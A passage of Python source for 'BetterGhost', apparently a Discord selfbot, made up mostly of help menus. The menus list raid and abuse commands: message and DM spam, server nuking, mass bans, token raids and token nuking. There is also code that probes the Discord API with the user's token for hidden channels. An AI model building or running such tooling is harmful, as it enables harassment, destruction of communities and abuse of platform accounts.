`{BetterGhost.command_prefix}`**cat** » A random cat image.
`{BetterGhost.command_prefix}`**dog** » A random dog image.
`{BetterGhost.command_prefix}`**shiba** » A random shiba image.
`{BetterGhost.command_prefix}`**fox** » A random fox image. (Thanks Imf44 <3)
`{BetterGhost.command_prefix}`**avatar [@user]** » Get the mentioned user's avatar.
`{BetterGhost.command_prefix}`**servericon** » Get the server's icon.
`{BetterGhost.command_prefix}`**achievement ["text"] (icon)** » Create a fake minecraft achievement image.
`{BetterGhost.command_prefix}`**challenge ["text"] (icon)** » Create a fake minecraft challenge image.
`{BetterGhost.command_prefix}`**captcha [text]** » Create a fake reCaptcha.
`{BetterGhost.command_prefix}`**amiajoke [@user]** » Make a user a joke.
`{BetterGhost.command_prefix}`**didyoumean ["text 1"] ["text 2"]** » Create a google did you mean image.
`{BetterGhost.command_prefix}`**drake ["text 1"] ["text 2"]** » Create a drake meme image.
`{BetterGhost.command_prefix}`**facts [text]** » Create a facts meme image.
`{BetterGhost.command_prefix}`**jokeoverhead [image url]** » Create a joke over head image.
`{BetterGhost.command_prefix}`**pornhub ["text 1"] ["text 2"]** » Create a pornhub logo image.
`{BetterGhost.command_prefix}`**salty [@user]** » Make someone salty.
`{BetterGhost.command_prefix}`**ship [@user 1] [@user 2]** » Ship two people.
`{BetterGhost.command_prefix}`**supreme [text]** » Create a supreme logo image.
`{BetterGhost.command_prefix}`**trash [@user]** » Put someone in the trash.
`{BetterGhost.command_prefix}`**what [image url]** » Make a what meme.
""")
embed.set_author(name="Image Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Image Commands ]
{BetterGhost.command_prefix}meme » A random meme.
{BetterGhost.command_prefix}cat » A random cat image.
{BetterGhost.command_prefix}dog » A random dog image.
{BetterGhost.command_prefix}shiba » A random shiba image.
{BetterGhost.command_prefix}fox » A random fox image. (Thanks Imf44 <3)
{BetterGhost.command_prefix}avatar [@user] » Get the mentioned user's avatar.
{BetterGhost.command_prefix}servericon » Get the server's icon.
{BetterGhost.command_prefix}achievement ["text"] (icon) » Create a fake minecraft achievement image.
{BetterGhost.command_prefix}challenge ["text"] (icon) » Create a fake minecraft challenge image.
{BetterGhost.command_prefix}captcha [text] » Create a fake reCaptcha.
{BetterGhost.command_prefix}amiajoke [@user] » Make a user a joke.
{BetterGhost.command_prefix}didyoumean ["text 1"] ["text 2"] » Create a google did you mean image.
{BetterGhost.command_prefix}drake ["text 1"] ["text 2"] » Create a drake meme image.
{BetterGhost.command_prefix}facts [text] » Create a facts meme image.
{BetterGhost.command_prefix}jokeoverhead [image url] » Create a joke over head image.
{BetterGhost.command_prefix}pornhub ["text 1"] ["text 2"] » Create a pornhub logo image.
{BetterGhost.command_prefix}salty [@user] » Make someone salty.
{BetterGhost.command_prefix}ship [@user 1] [@user 2] » Ship two people.
{BetterGhost.command_prefix}supreme [text] » Create a supreme logo image.
{BetterGhost.command_prefix}trash [@user] » Put someone in the trash.
{BetterGhost.command_prefix}what [image url] » Make a what meme.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="nsfw", description="NSFW related commands.", usage="nsfw")
async def nsfw(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**boobs** » Pictures or videos of boobs.
`{BetterGhost.command_prefix}`**ass** » Pictures or videos of ass.
`{BetterGhost.command_prefix}`**pussy** » Pictures or videos of pussy.
`{BetterGhost.command_prefix}`**porngif** » Porn gifs.
`{BetterGhost.command_prefix}`**hentai** » Pictures or videos of hentai.
""")
embed.set_author(name="NSFW Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ NSFW Commands ]
{BetterGhost.command_prefix}boobs » Pictures or videos of boobs.
{BetterGhost.command_prefix}ass » Pictures or videos of ass.
{BetterGhost.command_prefix}pussy » Pictures or videos of pussy.
{BetterGhost.command_prefix}porngif » Porn gifs.
{BetterGhost.command_prefix}hentai » Pictures or videos of hentai.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="moderation", description="Moderation related commands.", usage="moderation")
async def moderation(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**ban [@user]** » Ban the mentioned user.
`{BetterGhost.command_prefix}`**unban [id]** » Unban the mentioned id.
`{BetterGhost.command_prefix}`**banlist** » See the server's ban list.
`{BetterGhost.command_prefix}`**kick [@user]** » Kick the mentioned user.
`{BetterGhost.command_prefix}`**mute [@user]** » Mute the menitioned user.
`{BetterGhost.command_prefix}`**unmute [@user]** » Unmute the mentioned user.
`{BetterGhost.command_prefix}`**newrole [name]** » Create a new role.
`{BetterGhost.command_prefix}`**delrole [@role]** » Delete the mentioned role.
`{BetterGhost.command_prefix}`**purge [amount]** » Purge X amount of messages.
`{BetterGhost.command_prefix}`**lock** » Lock the command channel.
`{BetterGhost.command_prefix}`**unlock** » Unlock the command channel.
`{BetterGhost.command_prefix}`**lockdown** » Lock the entire server.
`{BetterGhost.command_prefix}`**unlockdown** » Unlock the entire server.
`{BetterGhost.command_prefix}`**spacechannel [channel name]** » Create a channel with spaces.
""")
embed.set_author(name="Moderation Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Moderation Commands ]
{BetterGhost.command_prefix}ban [@user] » Ban the mentioned user.
{BetterGhost.command_prefix}unban [id] » Unban the mentioned id.
{BetterGhost.command_prefix}banlist » See the server's ban list.
{BetterGhost.command_prefix}kick [@user] » Kick the mentioned user.
{BetterGhost.command_prefix}mute [@user] » Mute the menitioned user.
{BetterGhost.command_prefix}unmute [@user] » Unmute the mentioned user.
{BetterGhost.command_prefix}newrole [name] » Create a new role.
{BetterGhost.command_prefix}delrole [@role] » Delete the mentioned role.
{BetterGhost.command_prefix}purge [amount] » Purge X amount of messages.
{BetterGhost.command_prefix}lock » Lock the command channel.
{BetterGhost.command_prefix}unlock » Unlock the command channel.
{BetterGhost.command_prefix}lockdown » Lock the entire server.
{BetterGhost.command_prefix}unlockdown » Unlock the entire server.
{BetterGhost.command_prefix}spacechannel [channel name] » Create a channel with spaces.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="info", description="Info related commands.", usage="info")
async def info(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**userinfo [@user]** » Information about the mentioned user.
`{BetterGhost.command_prefix}`**serverinfo** » Information about the command server.
`{BetterGhost.command_prefix}`**watchdogstats** » Get stats about Hypixel's Anticheat, Watchdog.
`{BetterGhost.command_prefix}`**getmessage [message id]** » Get a message by ID.
`{BetterGhost.command_prefix}`**geoip [ip]** » Get information from an IP address.
`{BetterGhost.command_prefix}`**ping [ip/domain]** » Ping a domain or ip address.
`{BetterGhost.command_prefix}`**crypto [currency]** » Get the current data on a cryptocurrency.
""")
embed.set_author(name="Info Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Info Commands ]
{BetterGhost.command_prefix}userinfo [@user] » Information about the mentioned user.
{BetterGhost.command_prefix}serverinfo » Information about the command server.
{BetterGhost.command_prefix}watchdogstats » Get stats about Hypixel's Anticheat, Watchdog.
{BetterGhost.command_prefix}getmessage [message id] » Get a message by ID.
{BetterGhost.command_prefix}geoip [ip] » Get information from an IP address.
{BetterGhost.command_prefix}ping [ip/domain] » Ping a domain or ip address.
{BetterGhost.command_prefix}crypto [currency] » Get the current data on a cryptocurrency.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="user", description="User related commands.", usage="user")
async def user(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**purgeself [amount]** » Purge your messages.
`{BetterGhost.command_prefix}`**statuscycle** » Start a custom status cycle.
`{BetterGhost.command_prefix}`**statuscycletext [text]** » Set the text used in status cycle.
`{BetterGhost.command_prefix}`**clearstatus** » Clear your status.
`{BetterGhost.command_prefix}`**nickname [text]** » Set your nickname to anything.
`{BetterGhost.command_prefix}`**clearnickname** » Clear your nickname.
`{BetterGhost.command_prefix}`**ppin [message id]** » Add a message to your personal pins.
`{BetterGhost.command_prefix}`**ppins** » List all your pinned messages.
`{BetterGhost.command_prefix}`**ppindel [pin id]** » Delete a pin from your personal pins.
`{BetterGhost.command_prefix}`**backupfriends** » Backup all your friend's user IDs to a file.
`{BetterGhost.command_prefix}`**backupservers** » Backup all your servers and try to create invites for each one.
`{BetterGhost.command_prefix}`**changehypesquad [bravery/brilliance/balance]** » Change your hypesquad house.
`{BetterGhost.command_prefix}`**stealpfp [@user]** » Set someones avatar as your avatar.
""")
embed.set_author(name="User Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ User Commands ]
{BetterGhost.command_prefix}purgeself [amount] » Purge your messages.
{BetterGhost.command_prefix}statuscycle » Start a custom status cycle.
{BetterGhost.command_prefix}statuscycletext [text] » Set the text used in status cycle.
{BetterGhost.command_prefix}clearstatus » Clear your status.
{BetterGhost.command_prefix}nickname [text] » Set your nickname to anything.
{BetterGhost.command_prefix}clearnickname » Clear your nickname.
{BetterGhost.command_prefix}ppin [message id] » Add a message to your personal pins.
{BetterGhost.command_prefix}ppins » List all your pinned messages.
{BetterGhost.command_prefix}ppindel [pin id] » Delete a pin from your personal pins.
{BetterGhost.command_prefix}backupfriends » Backup all your friend's user IDs to a file.
{BetterGhost.command_prefix}backupservers » Backup all your servers and try to create invites for each one.
{BetterGhost.command_prefix}changehypesquad [bravery/brilliance/balance] » Change your hypesquad house.
{BetterGhost.command_prefix}stealpfp [@user] » Set someones avatar as your avatar.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="selfbot", description="Selfbot related commands.", usage="selfbot")
async def selfbot(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**afkmode** » Toggle afk mode.
`{BetterGhost.command_prefix}`**settings** » The bot's settings.
`{BetterGhost.command_prefix}`**restart** » Restart BetterGhost selfbot.
`{BetterGhost.command_prefix}`**prefix [prefix]** » Set the command prefix.
`{BetterGhost.command_prefix}`**dumpchat [amount] (channel id) (oldest first, true/false)** » Get the chat's history.
`{BetterGhost.command_prefix}`**invite** » Get BetterGhost's Discord server invite link.
`{BetterGhost.command_prefix}`**addccmd [name] [response]** » Add a custom command.
`{BetterGhost.command_prefix}`**delccmd [name]** » Delete a custom command.
`{BetterGhost.command_prefix}`**detections** » A list of all detections.
`{BetterGhost.command_prefix}`**snipers** » A list of all snipers.
`{BetterGhost.command_prefix}`**enablesniper [type]** » Enable a sniper.
`{BetterGhost.command_prefix}`**disablesniper [type]** » Disable a sniper.
`{BetterGhost.command_prefix}`**enabledetect [type]** » Enable a detection.
`{BetterGhost.command_prefix}`**disabledetect [type]** » Disable a detection.
`{BetterGhost.command_prefix}`**riskmode** » Disable and enable risk mode.
`{BetterGhost.command_prefix}`**sounds** » Toggle BetterGhost notification sounds.
`{BetterGhost.command_prefix}`**notifications** » Toggle BetterGhost notification.
""")
embed.set_author(name="Selfbot Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Selfbot Commands ]
{BetterGhost.command_prefix}settings » The bot's settings.
{BetterGhost.command_prefix}restart » Restart BetterGhost selfbot.
{BetterGhost.command_prefix}prefix [prefix] » Set the command prefix.
{BetterGhost.command_prefix}dumpchat [amount] (channel id) (oldest first, true/false) » Get the chat's history.
{BetterGhost.command_prefix}invite » Get BetterGhost's Discord server invite link.
{BetterGhost.command_prefix}addccmd [name] [response] » Add a custom command.
{BetterGhost.command_prefix}delccmd [name] » Delete a custom command.
{BetterGhost.command_prefix}detections » A list of all detections.
{BetterGhost.command_prefix}snipers » A list of all snipers.
{BetterGhost.command_prefix}enablesniper [type] » Enable a sniper.
{BetterGhost.command_prefix}disablesniper [type] » Disable a sniper.
{BetterGhost.command_prefix}enabledetect [type] » Enable a detection.
{BetterGhost.command_prefix}disabledetect [type] » Disable a detection.
{BetterGhost.command_prefix}riskmode » Disable and enable risk mode.
{BetterGhost.command_prefix}sounds » Toggle BetterGhost notification sounds.
{BetterGhost.command_prefix}notifications » Toggle BetterGhost notification.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="webhook", description="Webhook related commands.", usage="webhook")
async def webhook(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**delwebhook [id]** » Delete a webhook from the ID.
`{BetterGhost.command_prefix}`**newwebhook [name]** » Create a webhook in the command channel.
`{BetterGhost.command_prefix}`**spamwebhook [amount] [url] (message)** » Spam the shit out of a webhook.
`{BetterGhost.command_prefix}`**webhooksetup** » Creates a new server with webhooks.
`{BetterGhost.command_prefix}`**webhookinfo [id]** » Information about the webhook.
""")
embed.set_author(name="Webhook Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Webhook Commands ]
{BetterGhost.command_prefix}delwebhook [id] » Delete a webhook from the ID.
{BetterGhost.command_prefix}newwebhook [name] » Create a webhook in the command channel.
{BetterGhost.command_prefix}spamwebhook [amount] [url] (message) » Spam the shit out of a webhook.
{BetterGhost.command_prefix}webhooksetup » Creates a new server with webhooks.
{BetterGhost.command_prefix}webhookinfo [id] » Information about the webhook.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="abuse", description="Abuse related commands.", usage="abuse")
async def abuse(ctx, page:int = 1):
if __riskmode__:
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**spam [amount] [delay] [message]** » Spam X amount of times.
`{BetterGhost.command_prefix}`**stopspam** » Stop spamming messages.
`{BetterGhost.command_prefix}`**dmspam [amount] [delay] [@user] [message]** » Spam DM messages X amount of times.
`{BetterGhost.command_prefix}`**channelspam [amount] [delay] [message]** » Spam a message X amount of times in every channel.
`{BetterGhost.command_prefix}`**threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]** » Spam create threads with a starting message.
`{BetterGhost.command_prefix}`**ttsspam [amount] [delay] [message]** » Spam TTS messages X amount of times.
`{BetterGhost.command_prefix}`**reactspam [emoji] [messages]** » Spam reactions on X amount of messages.
`{BetterGhost.command_prefix}`**massghostping [delay] [@user]** » BetterGhost Ping the user in every channel.
`{BetterGhost.command_prefix}`**ghostping [@user]** » Ping a user then delete the message.
`{BetterGhost.command_prefix}`**massping (amount of messages) (send delay)** » Ping a mass amount of people in the command server.
`{BetterGhost.command_prefix}`**massnick [nickname]** » Change the nickname of all members in the command server.
`{BetterGhost.command_prefix}`**massdm [delay] [amount] [message]** » Send a DM message to everyone in the server.
`{BetterGhost.command_prefix}`**nukeserver** » Delete all roles and channels in the command server.
`{BetterGhost.command_prefix}`**destroyserver** » Completely destroy the command server.
`{BetterGhost.command_prefix}`**deletechannels** » Delete all of the command server's channels.
`{BetterGhost.command_prefix}`**deleteroles** » Delete all of the command server's roles.
`{BetterGhost.command_prefix}`**spamchannels [amount] (name)** » Spam create channels with a desired name. (Thanks Port <3)
`{BetterGhost.command_prefix}`**spamroles [amount] (name)** » Spam create roles with a desired name.
`{BetterGhost.command_prefix}`**raidjoin [delay] [invite]** » Make all your account tokens join a server.
`{BetterGhost.command_prefix}`**tokenraid [amount] [channel id] (message)** » Raid a server with all your account tokens.
`{BetterGhost.command_prefix}`**massban** » Ban all the members in the command server.
`{BetterGhost.command_prefix}`**masskick** » Kick all the members in the command server.
""")
embed.set_author(name="Abuse Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
{BetterGhost.command_prefix}spam [amount] [delay] [message] » Spam X amount of times.
{BetterGhost.command_prefix}stopspam » Stop spamming messages.
{BetterGhost.command_prefix}dmspam [amount] [delay] [@user] [message] » Spam DM messages X amount of times.
{BetterGhost.command_prefix}channelspam [amount] [delay] [message] » Spam X amount of times in all channels.
{BetterGhost.command_prefix}threadspam [delay] [amount] [name] [startmessage] » Spam create threads with a starting message.
{BetterGhost.command_prefix}ttsspam [amount] [delay] [message] » Spam TTS messages X amount of times.
{BetterGhost.command_prefix}reactspam [emoji] [messages] » Spam reactions on X amount of messages.
{BetterGhost.command_prefix}massghostping [delay] [@user] » BetterGhost Ping the user in every channel.
{BetterGhost.command_prefix}ghostping [@user] » Ping a user then delete the message.
{BetterGhost.command_prefix}massping » Ping a mass amount of people in the command server.
{BetterGhost.command_prefix}massnick [nickname] » Change the nickname of all members in the command server.
{BetterGhost.command_prefix}massdm [delay] [amount] [message] » Send a DM message to everyone in the server.
{BetterGhost.command_prefix}nukeserver » Delete all roles and channels in the command server.
{BetterGhost.command_prefix}destroyserver » Completely destroy the command server.
{BetterGhost.command_prefix}deletechannels » Delete all of the command server's channels.
{BetterGhost.command_prefix}deleteroles » Delete all of the command server's roles.
{BetterGhost.command_prefix}spamchannels [amount] (name) » Spam create channels with a desired name. (Thanks Port <3)
{BetterGhost.command_prefix}spamroles [amount] (name) » Spam create roles with a desired name.
{BetterGhost.command_prefix}raidjoin [delay] [invite] » Make all your account tokens join a server.
{BetterGhost.command_prefix}tokenraid [amount] [channel id] (message) » Raid a server with all your account tokens.
{BetterGhost.command_prefix}massban » Ban all the members in the command server.
{BetterGhost.command_prefix}masskick » Kick all the members in the command server.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="tools", description="Discord and other tools.", usage="tools")
async def tools(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**tokeninfo [token]** » Information about a token.
`{BetterGhost.command_prefix}`**nuketoken [token]** » Nuke a token.
`{BetterGhost.command_prefix}`**checktoken [token]** » Checks if a token is working.
`{BetterGhost.command_prefix}`**checktokens** » Check your tokens.
`{BetterGhost.command_prefix}`**nitrogen** » Generate a nitro code.
`{BetterGhost.command_prefix}`**tokengen** » Generate a discord user token.
`{BetterGhost.command_prefix}`**identitygen** » Generate a fake identity.
`{BetterGhost.command_prefix}`**passwordgen [length]** » Generate a secure password.
`{BetterGhost.command_prefix}`**ccgen** » Generate a fake Credit card.
""")
embed.set_author(name="Tools (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Tools ]
{BetterGhost.command_prefix}tokeninfo [token] » Information about a token.
{BetterGhost.command_prefix}nuketoken [token] » Nuke a token.
{BetterGhost.command_prefix}checktoken [token] » Checks if a token is working.
{BetterGhost.command_prefix}checktokens » Check your tokens.
{BetterGhost.command_prefix}nitrogen » Generate a nitro code.
{BetterGhost.command_prefix}tokengen » Generate a discord user token.
{BetterGhost.command_prefix}identitygen » Generate a fake identity.
{BetterGhost.command_prefix}passwordgen [length] » Generate a secure password.
{BetterGhost.command_prefix}ccgen » Generate a fake Credit card.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="giveaway", description="Giveaway related commands.", usage="giveaway")
async def giveaway(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**gstart [duration] [winners] [prize]** » Start a giveaway in the same channel
`{BetterGhost.command_prefix}`**gend [message id]** » End a giveaway
`{BetterGhost.command_prefix}`**greroll [message id]** » Re-roll a giveaway
""")
embed.set_author(name="Giveaway Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Giveaway Commands ]
{BetterGhost.command_prefix}gstart [duration] [winners] [prize] » Start a giveaway in the same channel
{BetterGhost.command_prefix}gend [message id] » End a giveaway
{BetterGhost.command_prefix}greroll [message id] » Re-roll a giveaway
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="proxy", description="Proxy related commands.", usage="proxy")
async def proxy(ctx, page:int=1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**proxies http** » Scrape HTTP proxies.
`{BetterGhost.command_prefix}`**proxies https** » Scrape HTTPS proxies.
`{BetterGhost.command_prefix}`**proxies socks4** » Scrape SOCKS4 proxies.
`{BetterGhost.command_prefix}`**proxies socks5** » Scrape SOCKS5 proxies.
`{BetterGhost.command_prefix}`**proxies all** » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
""")
embed.set_author(name="Proxy Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Proxy Commands ]
{BetterGhost.command_prefix}proxies http » Scrape HTTP proxies.
{BetterGhost.command_prefix}proxies https » Scrape HTTPS proxies.
{BetterGhost.command_prefix}proxies socks4 » Scrape SOCKS4 proxies.
{BetterGhost.command_prefix}proxies socks5 » Scrape SOCKS5 proxies.
{BetterGhost.command_prefix}proxies all » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="hiddenchannels", description="Sends a list of all the channels you cant see.", usage="hiddenchannels (guild id)")
async def hiddenchannels(ctx, guild=None):
if guild == None:
guild = ctx.guild
else:
guild = await BetterGhost.fetch_guild(int(guild))
hiddenChannels = []
message = await ctx.send("Looking for hidden channels, this could take a while...")
for channel in guild.channels:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
if __embedmode__:
hiddenChannels.append("#"+channel.name)
else:
hiddenChannels.append(channel.name)
print_info(f"{channel.name} is hidden.")
else:
print_info(f"{channel.name} is not hidden.")
# await asyncio.sleep(1)
if __embedmode__:
embed = discord.Embed(title=f"Hidden Channels", description=f"There is a total of `{len(hiddenChannels)}` hidden channels.\n \n```{', '.join(hiddenChannels)}```", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ Hidden Channels ]
There is a total of {len(hiddenChannels)} hidden channels.
{', '.join(hiddenChannels)}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="clearconsole", description="Clear your console.", usage="clearconsole", aliases=["resetconsole", "consoleclear", "consolereset"])
async def clearconsole(ctx):
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
# if is_windows():
# def startupPath():
# return str(shell.SHGetFolderPath(0, (shellcon.CSIDL_STARTUP, shellcon.CSIDL_COMMON_STARTUP)[0], None, 0))
# os.system("cls")
# os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
# if (CONFIG["load_on_startup"] == True):
# print("Adding to startup.......")
# USER_NAME = getpass.getuser()
# def add_to_startup(file_path=""):
# if file_path == "":
# file_path = os.path.dirname(os.path.realpath(__file__))
# bat_file = open(startupPath() + r"\\BetterGhost.bat", "w")
# bat_file.write(f"cd {file_path}\nstart BetterGhost")
# bat_file.close()
# add_to_startup()
# else:
# print("Removing from startup......")
# if os.path.exists(startupPath() + r"\\BetterGhost.bat"): os.remove(startupPath() + r"\\BetterGhost.bat");
# os.system("cls")
if is_linux():
os.system("clear")
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
